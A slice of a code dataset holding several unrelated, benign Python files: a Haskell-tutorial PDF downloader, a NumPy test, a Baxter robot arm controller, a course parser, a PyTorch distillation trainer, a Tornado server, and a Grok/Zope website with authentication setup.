FileNotFoundError:\n print(\"Created output directory\")\n os.mkdir(TMPOUTPUT)\n with Pool(10) as p:\n document = p.map(download, links)\n d = list(zip(order, document))\n with Pool(10) as p:\n p.map(save, d)\n print(\"\\n\\nDownloaded all files\\n\\n\")\n\n print(\"Creating \" + output)\n pdfkit.from_file([\"haskellWebOutput/\" + x + \".html\" for x in order], output)\n print( \"Created \" + output)\n\n#python3 learnYouAHaskell.py http://learnyouahaskell.com chapters output.pdf","sub_path":"LearnYouAHaskell.py","file_name":"LearnYouAHaskell.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591530930","text":"\nimport numpy as np\nimport unittest\nimport io\nfrom util4test import *\n\nclass TxtIoTest(unittest.TestCase):\n \n def test_loadtxt_simple(self):\n f = io.StringIO(\"0 1\\n2 3\")\n\n a = np.loadtxt(f)\n self.assertEqual(np.float,a.dtype)\n \n assert_ndarray_almost_equal( self,[[0.0,1.0],\n [2.0,3.0]],a)\n \n def test_loadtxt_dtype(self):\n f = io.StringIO(\"Male 21 72\\nFemale 35 58\")\n a = np.loadtxt(f, dtype={\n 'names': ('gender', 'age', 'weight'),\n 'formats': ('S8', 'i4', 'f4')}) \n assert_ndarray_equal( self, [b\"Male\",b\"Female\"],a[\"gender\"])\n assert_ndarray_equal( self, [21,35],a[\"age\"])\n assert_ndarray_equal( self, [72,58],a[\"weight\"])\n \n def test_loadtxt_sample1(self):\n f = io.StringIO(\"1,0,2\\n3,0,4\")\n a = np.loadtxt(f, delimiter=',', usecols=(0, 2))\n assert_ndarray_almost_equal( self,[[1.0,2.0],[3.0,4.0]],a)","sub_path":"Python/TestNumPy3/test_txt_io.py","file_name":"test_txt_io.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"302528905","text":"#!/usr/bin/env python\n\n# Jon Rovira\n# Summer 2013\n\n################\n# ROS IMPORTS: #\n################\nimport roslib\nimport rospy\nfrom std_msgs.msg import UInt16\n\n####################\n# RETHINK IMPORTS: #\n####################\nimport baxter_interface\n\n###############\n# NU IMPORTS: #\n###############\nfrom trajectory import Trajectory\nfrom vector_operations import (make_vector_from_POINTS,\n\t angle_between_vectors,\n\t vector_projection_onto_plane,\n\t shortest_vector_from_point_to_vector)\n\n##################\n# OTHER IMPORTS: #\n##################\nimport operator\nimport math\n\n###################\n# MOVEIT IMPORTS: #\n###################\nimport moveit_commander\nimport moveit_msgs.msg\n\n# from trajectory_speed_up import traj_speed_up\n\nclass Crane():\n \"\"\"\n Crane control class\n\n This class allows Baxter to mimic an inidividual's left arm with Baxter's\n right arm and grants the individual control of Baxter's gripper. The Crane\n obtains tracking data by subscribing to the /skeleton messages published\n by the skeletontracker_nu script.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Crane constructor\n \"\"\"\n self.arm = baxter_interface.Limb('right')\n self.gripper = baxter_interface.Gripper('right')\n # self.pub_rate = rospy.Publisher('/robot/joint_state_publish_rate', UInt16)\n # self.pub_rate.publish(500)\n self.neutral_position = dict(zip(self.arm.joint_names(),\n [0.00, 0.00, 1.57, 0.00, 0.00, 0.00, 0.00]))\n self.crane_l_angles = {'left_s0': 0.35, 'left_s1': 0.00,\n 'left_e0': 0.00, 'left_e1': 1.57,\n 'left_w0': 0.00, 'left_w1': 0.00,\n 'left_w2': 0.00}\n self.gripper_state = True\n self.gripper_state_timer = 0\n self.right_arm = moveit_commander.MoveGroupCommander(\"right_arm\")\n\n def desired_joint_vals(self, left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand):\n \"\"\"\n Returns the joint values based on the human skeleton.\n \"\"\"\n angles = []\n if self.human_to_baxter(left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand, angles):\n self.gripper.close()\n else:\n self.gripper.open()\n\n r_positions = dict(zip(self.arm.joint_names(),\n [angles[0], angles[1], angles[2], angles[3],\n angles[4], angles[5], angles[6]]))\n\n return dict(self.crane_l_angles, **r_positions)\n\n def desired_pose_vals(self, left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand, torso):\n # Find distance from shoulder to hand for human\n # Total arm length:\n arm_length = (math.sqrt(math.pow((left_shoulder.x - left_elbow.x),2) +\n math.pow((left_shoulder.y - left_elbow.y),2) +\n math.pow((left_shoulder.z - left_elbow.z),2)) +\n math.sqrt(math.pow((left_elbow.x - left_hand.x),2) +\n math.pow((left_elbow.y - left_hand.y),2) +\n math.pow((left_elbow.z - left_hand.z),2)))\n RJ_ARM_LENGTH = 41*2.54/100.0\n #From URDF,\n x_offset = 0.055695\n y_offset = 0\n z_offset = 0.011038\n # Use left values\n x = (left_hand.x - left_shoulder.x - torso.x)*RJ_ARM_LENGTH/arm_length + x_offset\n y = (left_hand.y - left_shoulder.y - torso.y)*RJ_ARM_LENGTH/arm_length + y_offset\n z = (left_hand.z - left_shoulder.z - torso.z)*RJ_ARM_LENGTH/arm_length + z_offset\n\n # Set orientation\n roll = 0 # Could be defined to be in line with the arm or something\n pitch = math.pi/2.0 # Could be defined to be in line with the arm or something\n yaw = 0\n pose = {'x': x, 'y': y, 'z': z, 'roll': roll, 'pitch': pitch, 'yaw': yaw}\n\n # Gripper Control Arm\n r_upper_arm = make_vector_from_POINTS(right_shoulder, right_elbow)\n r_forearm = make_vector_from_POINTS(right_elbow, right_hand)\n # Event\n theta = angle_between_vectors(r_upper_arm, r_forearm)\n if theta > 0.8:\n self.gripper.close()\n else:\n self.gripper.open()\n\n return pose\n \n\n def move(self, left_shoulder, left_elbow, left_hand, right_shoulder, right_elbow, right_hand):\n \"\"\"\n Moves the crane arm and gripper based on human skeleton positions\n \"\"\"\n angles = []\n if self.human_to_baxter(left_shoulder, left_elbow, left_hand,\n right_shoulder, right_elbow, right_hand, angles):\n self.gripper.close()\n else:\n self.gripper.open()\n\n\n r_positions = dict(zip(self.arm.joint_names(),\n [angles[0], angles[1], angles[2], angles[3], angles[4], angles[5], angles[6]]))\n # self.arm.set_joint_positions(r_positions)\n self.right_arm.stop()\n self.right_arm.set_joint_value_target(r_positions)\n traj = self.right_arm.plan()\n new_traj = traj_speed_up(traj, spd=3.0)\n self.right_arm.execute(new_traj)\n\n def human_to_baxter(self, l_sh, l_el, l_ha, r_sh, r_el, r_ha, a):\n \"\"\"\n Computes angles sent to Baxter's arm, checks if gripper should adjust\n \"\"\"\n # Crane Arm\n l_upper_arm = make_vector_from_POINTS(l_sh, l_el)\n l_forearm = make_vector_from_POINTS(l_el, l_ha)\n # S0\n v_xz = vector_projection_onto_plane(l_upper_arm, [0,0,-1], [-1,0,0])\n theta = angle_between_vectors(v_xz, [-1,0,0])\n s0 = theta - math.pi/4\n # S1\n theta = angle_between_vectors(l_upper_arm, v_xz)\n if l_el.y > l_sh.y:\n s1 = theta\n else:\n s1 = -theta\n # E0\n n_upper_arm = shortest_vector_from_point_to_vector(l_ha, l_upper_arm,\n l_forearm, l_sh)\n theta = angle_between_vectors(n_upper_arm, [0,1,0])\n e0 = theta\n # E1\n theta = angle_between_vectors(l_upper_arm, l_forearm)\n e1 = theta\n # W0, W1, and W2\n w0 = -1.57\n w1 = 0.00\n w2 = -0.30\n # Check if angles are valid\n self.check_angles(s0,s1,e0,e1,w0,w1,w2,a)\n\n # Gripper Control Arm\n r_upper_arm = make_vector_from_POINTS(r_sh, r_el)\n r_forearm = make_vector_from_POINTS(r_el, r_ha)\n # Event\n theta = angle_between_vectors(r_upper_arm, r_forearm)\n if theta > 0.8:\n return True\n return False\n\n def check_angles(self, s0, s1, e0, e1, w0, w1, w2, angles):\n\n if -0.25 < s0 and s0 < 1.60:\n angles.append(s0)\n elif -0.25 < s0:\n angles.append(1.60)\n else:\n angles.append(-0.25)\n\n # s1 assignment in safe range\n if -2.00 < s1 and s1 < 0.90:\n angles.append(s1)\n elif -2.00 < s1:\n angles.append(0.90)\n else:\n angles.append(-2.00)\n\n # e0 assignment\n angles.append(e0)\n\n # e1 assignment in safe range\n if 0.10 < e1 and e1 < 2.50:\n angles.append(e1)\n elif 0.10 < e1:\n angles.append(2.50)\n else:\n angles.append(0.10)\n\n # w0, w1, and w2 assignment\n angles.extend([w0,w1,w2])\n","sub_path":"src/crane.py","file_name":"crane.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"55887712","text":"'''\r\ncisclass.py\r\n'''\r\nimport re\r\n\r\nclass CISclasses:\r\n def __init__(self):\r\n ''' constructor '''\r\n FILE_NAME = \"lab8_no_blankline.txt\"\r\n seasonCount = 0\r\n self.season = list()\r\n self.schedule = list()\r\n self.courseNum = list()\r\n self.className = list()\r\n self.dataBase = dict() # 1st dictionary\r\n self.dataBase2 = dict() # 2nd dictionary\r\n try:\r\n with open(FILE_NAME) as inFile:\r\n for line in inFile:\r\n m1 = re.findall(\">[A-Z]{3} \\d+[A-Z]*<\", line) # course title\r\n m2 = re.findall('([\"][>]([(]|[A-Za-z]).+([a-zA-Z]|[)]|[+])[<])', line) # course's introduction\r\n if len(m1) != 0:\r\n val = m1[0]\r\n val = re.sub(\"\\>\",'', val)\r\n val = re.sub(\"\\<\",'', val)\r\n self.courseNum.append(val)\r\n if len(m2) != 0:\r\n val = m2[0]\r\n if \"\" not in str(val):\r\n val = val[0] # get string value from tuple\r\n val = re.sub(\">\", \"\" , val)\r\n val = re.sub(\"<\", \"\" , val)\r\n val = re.sub('\"', \"\" , val)\r\n self.className.append(val)\r\n if \"#ffffff\" in line: #the line of schedule: fall/winter/spring/summer\r\n if \">x<\" in line:\r\n self.season.append(True) # assign True\r\n else:\r\n self.season.append(False) # assign False\r\n if len(self.season) == 4:\r\n seasonCount = 0\r\n t = (self.season[0],self.season[1], self.season[2], self.season[3]) # store into a tuple\r\n self.schedule.append(t) # append the tuple in the list\r\n self.season = list() # initialize the attribute for next course\r\n seasonCount += 1\r\n self.dataBase = self._createDict(self.courseNum, self.className, self.schedule)\r\n self.dataBase2 = self._createDict(self.className, self.courseNum, self.schedule)\r\n except FileNotFoundError as e:\r\n print(\"can't open\", FILE_NAME)\r\n raise SystemExit\r\n \r\n def _createDict(self, key, val1, val2):\r\n ''' create the dictionary '''\r\n d = dict()\r\n for i in range(len(key)):\r\n L = list([val1[i], val2[i]])\r\n d[key[i]] = d.get(0,L)\r\n return d\r\n \r\n def option1(self, userInput):\r\n ''' to search the class by number '''\r\n val = self.dataBase[userInput]\r\n intro = val[0] # calss name\r\n schedule = val[1] # schedule\r\n formatedSche = self._printSchedule(schedule)\r\n return (userInput, intro + \": \" + formatedSche) # returns tuple\r\n \r\n def _printSchedule(self,schedule):\r\n ''' to private method option1 to format the quarter message '''\r\n retVal = \"\"\r\n fall = schedule[0]\r\n winter = schedule[1]\r\n spring = schedule[2]\r\n summer = schedule[3]\r\n if fall == True:\r\n retVal += \"Fall,\"\r\n if winter == True:\r\n retVal += \"Winter,\"\r\n if spring == True:\r\n retVal += \"Spring,\"\r\n if summer == True:\r\n retVal += \"Summer\"\r\n if retVal[-1] == \",\": # if the final char is ','\r\n retVal = self._removeChar(retVal, len(retVal)-1)\r\n return retVal\r\n \r\n def _removeChar(self, str, index):\r\n ''' a method to remove a char in specific index'''\r\n firstPart = str[0:index]\r\n lastPart = str[index+1:len(str)-1]\r\n return firstPart + lastPart\r\n \r\n def option2(self, userInput):\r\n ''' to search the classes by topic '''\r\n d2 = self.dataBase2\r\n resultList = list()\r\n resultMsg = \"\"\r\n regex = \"\"\r\n firstChar = userInput[0]\r\n lastChar = \"\"\r\n if len(userInput) > 1:\r\n lastChar = userInput[-1]\r\n \r\n if userInput == \"C++\": # special case for \"C++\"\r\n regex = \"\\\\bC\\+\\+\"\r\n elif userInput == \"C#\": # special case for C#\r\n regex = \"\\\\bC#\"\r\n elif userInput == \"C\": # special case for C\r\n regex = \"((^|\\s)(C)(\\s)+)\"\r\n else:\r\n regex = \"\\\\b\" + userInput + \"\\\\b\" \r\n for elem in self.dataBase:\r\n classList = self.dataBase[elem] # access the value of dict (which is a list)\r\n className = classList[0] # get class name\r\n if userInput in className.title(): # if the keyword of topic is found (but not entirely)\r\n target = re.search(regex, className, re.I) # search for exact word. No more or less\r\n if target != None:\r\n targetVal = (target.group().rstrip()).lstrip() # remove all the white spaces before and after the string\r\n if targetVal.title() == userInput:\r\n resultList.append(className)\r\n resultList.sort() # sort the list of class name\r\n \r\n # formating the return message\r\n for key in resultList:\r\n elem = d2[key] # use dictionary's key(class Name) to get the list\r\n name = elem[0] # get the class name\r\n result = name + \": \" + key + \"\\n\"\r\n resultMsg += result\r\n return resultMsg\r\n \r\n def option3(self, inputTopic, inputQuarter):\r\n ''' to search the classes by topic and quarter '''\r\n d2 = self.dataBase2 \r\n resultList = list()\r\n resultMsg = \"\"\r\n index = 0\r\n if inputQuarter == \"Fall\":\r\n index = 0\r\n elif inputQuarter == \"Winter\":\r\n index = 1\r\n elif inputQuarter == \"Spring\":\r\n index = 2\r\n elif inputQuarter == \"Summer\":\r\n index = 3\r\n for elem in self.dataBase:\r\n classList = self.dataBase[elem] \r\n className = classList[0] # get class name\r\n schedule = classList[1] # get 4 quarter for each class\r\n if inputTopic in className: # if the topic is found\r\n if schedule[index] == True: # if this quarter is available\r\n resultList.append(className) \r\n resultList.sort()\r\n \r\n # formating the return message\r\n for key in resultList:\r\n elem = d2[key] # use dictionary's key(class Name) to get the list\r\n name = elem[0] # get the class name\r\n result = name + \": \" + key + \"\\n\"\r\n resultMsg += result\r\n return resultMsg ","sub_path":"CIS 41A/HW#8/cisclasses.py","file_name":"cisclasses.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"543826345","text":"import torch.optim as optim\nimport torch.nn as nn\nimport torch\nimport os\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef distilltrain(teacher, student, train_iter, dev_iter, args):\n print(\"开始蒸馏!\")\n teacher.eval()\n student.train()\n\n optimizer = optim.Adam(student.parameters(), lr = args.lr)\n\n best_acc = 0\n steps = 0\n last_step = 0\n teacher = teacher.to(device)\n student = student.to(device)\n \n print('training...')\n for epoch in range(args.epochs):\n student.train()\n for batch in train_iter: \n feature, target, mask = batch[1], batch[0], batch[2]\n feature = feature.to(device)\n target = target.to(device)\n mask = mask.to(device)\n with torch.no_grad():\n t_logits = teacher(feature, mask, None)\n # 清除梯度\n optimizer.zero_grad()\n output = student(feature)\n losscalc = nn.KLDivLoss()\n loss = 0.5*losscalc(F.log_softmax(output/2.0, dim=-1), F.softmax(t_logits/2.0, dim=-1)*2.0**2) + 0.5*F.cross_entropy(F.sigmoid(output), target)\n loss.backward()\n optimizer.step()\n \n steps += 1\n if steps % 10 == 0:\n result = torch.max(output,1)[1].view(target.size())\n corrects = (result.data == target.data).sum()\n accuracy = corrects*100.0/len(batch[0])\n print('\\rBatch[{}] - loss: {:.6f} acc: {:.4f}'.format(\n steps, loss.data.item(), accuracy))\n elif steps % 200 == 0:\n save(student, args.save_dir,'snapshot',steps)\n dev_acc = eval(dev_iter, student, args)\n if dev_acc > best_acc:\n best_acc = dev_acc\n last_step = steps\n if args.save_best:\n save(student, args.save_dir,'best',steps)\n\n\n\n\n\ndef save(model, save_dir, save_prefix, steps):\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n save_prefix = os.path.join(save_dir,save_prefix)\n save_path = '{}_steps_{}.pt'.format(save_prefix,steps)\n torch.save(model.state_dict(),save_path)\n\ndef eval(data_iter, model, args):\n model.eval()\n corrects, avg_loss = 0,0\n for batch in data_iter:\n feature, target = batch[1], batch[0]\n feature = feature.to(device)\n target = target.to(device)\n \n logit = model(feature)\n loss = F.cross_entropy(logit,target)\n \n avg_loss += loss.data\n result = torch.max(logit,1)[1]\n corrects += (result.view(target.size()).data == target.data).sum()\n \n size = len(data_iter.dataset)\n avg_loss /= size \n accuracy = 100.0 * corrects/size\n print('\\nEvaluation - loss: {:.6f} acc: {:.4f}%({}/{}) \\n'.format(avg_loss,accuracy,corrects,size))\n \n return accuracy\n","sub_path":"distill_test/distiller.py","file_name":"distiller.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259434684","text":"\n\nfrom xai.brain.wordbase.nouns._tattoo import _TATTOO\n\n#calss header\nclass _TATTOOED(_TATTOO, ):\n\tdef __init__(self,): \n\t\t_TATTOO.__init__(self)\n\t\tself.name = \"TATTOOED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"tattoo\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_tattooed.py","file_name":"_tattooed.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"381632815","text":"# -*- coding: utf-8 -*-\n\nimport tornado.ioloop\nimport tornado.web\nimport tornado.options\nimport secret\nimport os\n\nfrom handlers.main import MainHandler\nfrom handlers.nl import NaturalLanguageSearch\nimport handlers.api as api\nimport handlers.auth as auth\nimport admin.main as admin\nimport admin.users as admin_users\nimport ws, db\n\nis_closing = False\n\ndef signal_handler(signum, frame):\n global is_closing\n is_closing = True\n\ndef try_exit():\n global is_closing\n if is_closing:\n # clean up here\n tornado.ioloop.IOLoop.instance().stop()\n\nclass NoCacheStaticHandler(tornado.web.StaticFileHandler):\n \"\"\" Request static file handlers for development and debug only.\n It disables any caching for static file.\n \"\"\"\n def set_extra_headers(self, path):\n self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')\n\ndef main():\n \n tornado.options.define(\"static_path\", default = \"../client/static\", help = \"path to static files directory\", type = str)\n tornado.options.define(\"templates_path\", default = \"../client/templates\", help = \"path to template files directory\", type = str)\n tornado.options.define(\"sctp_port\", default = 55770, help = \"port of sctp server\", type = int)\n tornado.options.define(\"sctp_host\", default = \"localhost\", help = \"host of sctp server\", type = str)\n tornado.options.define(\"event_wait_timeout\", default = 10, help = \"time to wait commands processing\", type = int)\n tornado.options.define(\"idtf_serach_limit\", default = 20, help = \"number of maximum results for searching by identifier\", type = int)\n tornado.options.define(\"redis_host\", default = \"localhost\", help = \"host of redis server\", type = str)\n tornado.options.define(\"redis_port\", default = 6379, help = \"port of redis server\", type = int)\n tornado.options.define(\"redis_db_idtf\", default = 0, help = \"number of redis database to store identifiers\", type = int)\n tornado.options.define(\"redis_db_user\", default = 1, help = \"number of redis database to store user info\", type = int)\n tornado.options.define(\"host\", default = \"localhost\", help = \"host name\", type = str)\n tornado.options.define(\"port\", default = 8000, help = \"host port\", type = int)\n \n tornado.options.define(\"google_client_id\", default = \"\", help = \"client id for google auth\", type = str)\n tornado.options.define(\"google_client_secret\", default = \"\", help = \"client secret for google auth\", type = str)\n \n tornado.options.define(\"apiai_subscription_key\", default = \"\", help = \"subscription key for api.ai\", type = str)\n tornado.options.define(\"apiai_client_access_token\", default = \"\", help = \"client access token for api.ai\", type = str)\n \n tornado.options.define(\"user_key_expire_time\", default = 600, help = \"user key expire time in seconds\", type = int)\n tornado.options.define(\"super_emails\", default = \"\", help = \"email of site super administrator (maximum rights)\", type = list)\n tornado.options.define(\"db_path\", default = \"data.db\", help = \"path to database file\", type = str)\n \n tornado.options.define(\"cfg\", default = \"server.conf\", help = \"path to configuration file\", type = str)\n\n tornado.options.parse_command_line()\n if os.path.exists(tornado.options.options.cfg):\n tornado.options.parse_config_file(tornado.options.options.cfg)\n\n # prepare database\n database = db.DataBase()\n database.init()\n\n rules = [\n (r\"/\", MainHandler),\n\n (r\"/static/(.*)\", NoCacheStaticHandler, {\"path\": tornado.options.options.static_path}),\n\n # api\n (r\"/api/init/\", api.Init),\n (r\"/api/context/\", api.ContextMenu),\n (r\"/api/cmd/do/\", api.CmdDo),\n (r\"/api/cmd/text/\", NaturalLanguageSearch),\n \n (r\"/api/question/answer/translate/\", api.QuestionAnswerTranslate),\n \n (r\"/api/link/content/\", api.LinkContent),\n (r\"/api/link/format/\", api.LinkFormat),\n \n (r\"/api/languages/\", api.Languages),\n (r\"/api/languages/set/\", api.LanguageSet),\n \n (r\"/api/idtf/find/\", api.IdtfFind),\n (r\"/api/idtf/resolve/\", api.IdtfResolve),\n \n (r\"/api/addr/resolve/\", api.AddrResolve),\n \n (r\"/api/info/tooltip/\", api.InfoTooltip),\n \n (r\"/api/user/\", api.User),\n \n (r\"/auth/google$\", auth.GoogleOAuth2LoginHandler),\n (r\"/auth/logout$\", auth.LogOut),\n \n (r\"/admin$\", admin.MainHandler),\n (r\"/admin/users/get$\", admin_users.UsersInfo),\n (r\"/admin/users/set_rights$\", admin_users.UserSetRights),\n (r\"/admin/users/list_rights$\", admin_users.UserListRights),\n\n (r\"/sctp\", ws.SocketHandler),\n ]\n\n application = tornado.web.Application(\n handlers = rules, \n cookie_secret = secret.get_secret(),\n login_url = \"/auth/google\",\n template_path = tornado.options.options.templates_path,\n xsrf_cookies = False,\n gzip = True,\n \n google_oauth = {\"key\": tornado.options.options.google_client_id, \n \"secret\": tornado.options.options.google_client_secret\n }\n )\n\n application.listen(tornado.options.options.port)\n tornado.ioloop.PeriodicCallback(try_exit, 1000).start()\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"128104195","text":"import zope.component\nimport zope.interface\nimport zope.schema\nimport zope.event\nimport zope.lifecycleevent\nfrom zope.schema.fieldproperty import FieldProperty\nfrom zope.traversing.browser import absoluteURL\nfrom zope.app.intid import IntIds\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.app.catalog.catalog import Catalog\nfrom zope.app.catalog.interfaces import ICatalog\nfrom zope.app.security.interfaces import (ILogout,\n IAuthentication,\n IUnauthenticatedGroup,\n IUnauthenticatedPrincipal)\nfrom zope.securitypolicy.interfaces import (IRolePermissionManager,\n IPrincipalPermissionManager)\nfrom zope.app.session.interfaces import (IClientIdManager,\n ISessionDataContainer)\nfrom zope.app.session.http import CookieClientIdManager\nfrom zope.app.session.interfaces import ISessionDataContainer\nfrom zope.app.session.session import PersistentSessionDataContainer\n\nfrom z3c.authentication.cookie.interfaces import SESSION_KEY\nfrom z3c.authentication.cookie.session import \\\n CookieCredentialSessionDataContainer\n\nfrom z3c.form import form, field, button, group\nfrom z3c.form.browser.checkbox import CheckBoxFieldWidget\nfrom z3c.form.interfaces import IWidgets\nfrom z3c.formui import layout\nfrom z3c.formjs import jsaction, jsevent, jsvalidator, ajax\nfrom z3c.configurator import configurator\nfrom z3c.authentication.simple.authentication import SimpleAuthentication\n\nimport grok\n\nimport mars.layer\nimport mars.template\nimport mars.view\nimport mars.form\n\nfrom tfws.website import interfaces\nfrom tfws.website import authentication\nfrom tfws.website import permissions\nfrom tfws.website import roles\nfrom tfws.website import members\nfrom tfws.website.catalog import setup_catalog\nfrom tfws.website.layer import IWebSiteLayer\nfrom tfws.website.i18n import MessageFactory as _\n\nmars.layer.layer(IWebSiteLayer)\n\ngrok.global_utility(PersistentSessionDataContainer,\n ISessionDataContainer,\n name='')\n\nclass WebSite(grok.Application, grok.Container):\n \"\"\"Mars/Grok/Z3C demo website\n\n \"\"\"\n zope.interface.implements(interfaces.IWebSite)\n grok.local_utility(IntIds, IIntIds) # needed for the catalog\n grok.local_utility(Catalog, ICatalog, setup=setup_catalog,\n name_in_container='wcatalog')\n grok.local_utility(SimpleAuthentication, IAuthentication,\n setup=authentication.setup_site_auth, \n name_in_container='auth')\n grok.local_utility(CookieCredentialSessionDataContainer,\n ISessionDataContainer,\n setup=authentication.setup_cookie_session_container, \n name_in_container='CookieCredentialSessionDataContainer',\n name=SESSION_KEY)\n grok.local_utility(CookieClientIdManager,\n IClientIdManager,\n setup=authentication.setup_cookie_client_manager, \n name_in_container='LifeTimeSessionClientIdManager',\n name='LifeTimeSessionClientIdManager')\n\n title = FieldProperty(interfaces.IWebSite['title'])\n description = FieldProperty(interfaces.IWebSite['description'])\n\n def __init__(self, title=u'', description=u''):\n super(WebSite, self).__init__()\n self.title = title\n self.description = description\n\n def __repr__(self):\n return '<%s %r>' % (self.__class__.__name__, self.__name__)\n\n def traverse(self, name):\n if name == 'members':\n return members.Members(self)\n\nclass Index(mars.view.PageletView):\n \"\"\"Temp display view for site\"\"\"\n grok.require(permissions.VIEW)\n\n def render(self):\n \"\"\"First try to locate an index page for the site\"\"\"\n for page in self.context.values():\n if interfaces.IFolderIndex.providedBy(page):\n view = zope.component.getMultiAdapter(\n (page, self.request), name='index')\n return view(page, self.request).render()\n template = zope.component.getMultiAdapter(\n (self, self.request), self._template_interface, \n name=self._template_name)\n return template(self)\n\n\nclass IndexTemplate(mars.template.TemplateFactory):\n grok.context(Index)\n grok.template('templates/index.pt')\n\n\nclass InitialManagerGroup(group.Group):\n label = u'Initial Manager Account'\n fields = field.Fields(interfaces.IWebSiteMember, prefix=\"member\").select(\n 'member.login', 'member.password', 'member.firstName', \n 'member.lastName', 'member.email')\n\n\nclass ContentMetaDataGroup(group.Group):\n label = u'Site Metadata'\n fields = field.Fields(interfaces.IWebSite).select('title', \n 'description')\n\n# try this again later\n#class IEditButtons(zope.interface.Interface):\n# apply = jsaction.JSButton(title=_('Apply'))\n# applyView = jsaction.JSButton(title=_('Apply and View'))\n\n\nclass Edit(mars.form.FormView, layout.FormLayoutSupport, \n group.GroupForm, form.EditForm):\n \"\"\"Edit form for site\"\"\"\n grok.name('edit')\n grok.require(permissions.MANAGECONTENT)\n form.extends(form.EditForm)\n label = _('Edit Metadata for the site.')\n groups = (ContentMetaDataGroup,)\n\n @button.buttonAndHandler(u'Apply and View', name='applyView')\n def handleApplyView(self, action):\n self.handleApply(self, action)\n if not self.widgets.errors:\n url = absoluteURL(self.context, self.request)\n self.request.response.redirect(url)\n\n\nclass Login(mars.form.FormView, layout.FormLayoutSupport, \n form.Form):\n grok.context(zope.interface.Interface)\n fields = field.Fields(zope.schema.TextLine(\n __name__ = 'login',\n title=_(u'Username'),\n description=_(u'Username for login.'),\n required=True),\n zope.schema.Password(\n __name__ = 'password',\n title=_(u'Password'),\n description=_(u'Password for login.'),\n required=True),\n zope.schema.Bool(\n __name__ = 'autologin',\n title=_(u'Remember me'),\n description=_(u'Auto login.'),\n default=True,\n required=False),\n zope.schema.TextLine(\n __name__ = 'camefrom',\n title=_(u'Came from'),\n description=_(u'Redirect to this url.'),\n required=True))\n status = ''\n label = _('Login')\n\n @button.buttonAndHandler(_('Login'), name='login')\n def handleLogin(self, action):\n if (not IUnauthenticatedPrincipal.providedBy(self.request.principal)):\n self.request.response.redirect(self.camefrom)\n else:\n self.status = _(\"Login unsuccessfull, please try again.\")\n\n def updateWidgets(self):\n '''See interfaces.IForm'''\n self.widgets = zope.component.getMultiAdapter(\n (self, self.request, self.getContent()), IWidgets)\n self.widgets.ignoreContext = True\n self.widgets.update()\n self.widgets['camefrom'].value = self.camefrom\n self.widgets['camefrom'].mode = 'hidden'\n\n @property\n def camefrom(self):\n camefrom = self.request.get('camefrom', None)\n if camefrom is None:\n camefrom = self.request.get('form.widgets.camefrom', None)\n if camefrom is None:\n camefrom = absoluteURL(self.context, self.request)\n return camefrom\n\nclass AutoLoginTemplateFactory(mars.form.WidgetTemplateFactory):\n \"\"\"Define a custom template for autologin field.\n\n I'm thinking that I could use this field to choose between using cookie (ie\n lifetime) and session credentials. In the meantime I'm leaving it with\n lifetime cookie.\n \"\"\"\n grok.name('input')\n grok.context(zope.interface.Interface)\n grok.template('templates/autologin-widget.pt')\n mars.form.view(Login)\n mars.form.field(zope.schema.Bool)\n\n\nclass Logout(mars.view.PageletView):\n grok.context(zope.interface.Interface)\n grok.require(permissions.VIEW)\n\n def update(self):\n camefrom = self.request.get('camefrom', '.')\n if not IUnauthenticatedPrincipal.providedBy(self.request.principal):\n pau = zope.component.getUtility(IAuthentication)\n ILogout(pau).logout(self.request)\n if camefrom:\n return self.request.response.redirect(camefrom)\n if camefrom is None:\n## get and use site instead of self.context?\n url = absoluteURL(self.context, self.request)\n return self.request.response.redirect(url)\n else:\n return self.request.response.redirect(camefrom)\n\nclass SiteConfigurator(grok.Adapter, configurator.ConfigurationPluginBase):\n \"\"\"Configure the site, this has access to the data submitted by the add\n form as well as local utilities defined with grok.local_utility.\"\"\"\n zope.component.adapts(interfaces.IWebSite)\n\n def __call__(self, data):\n \n auth = zope.component.getUtility(IAuthentication, \n context=self.context)\n # Add a Admin to the administrators group\n login = data['member.login']\n admin = authentication.WebSiteMember(login, data['member.password'], \n data['member.firstName'], data['member.lastName'], \n data['member.email'])\n zope.event.notify(zope.lifecycleevent.ObjectCreatedEvent(admin))\n auth['members'].add(admin)\n\n adminGroup = auth['groups']['groups.Administrators']\n adminGroup.setPrincipals(\n adminGroup.principals + (admin.__name__,), check=False)\n\n # grant permissions to roles\n role_manager = IRolePermissionManager(self.context)\n role_manager.grantPermissionToRole(permissions.MANAGESITE, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.MANAGECONTENT, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.MANAGEUSERS, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.VIEW, \n roles.ADMINISTRATOR)\n role_manager.grantPermissionToRole(permissions.MANAGECONTENT, \n roles.MEMBER)\n 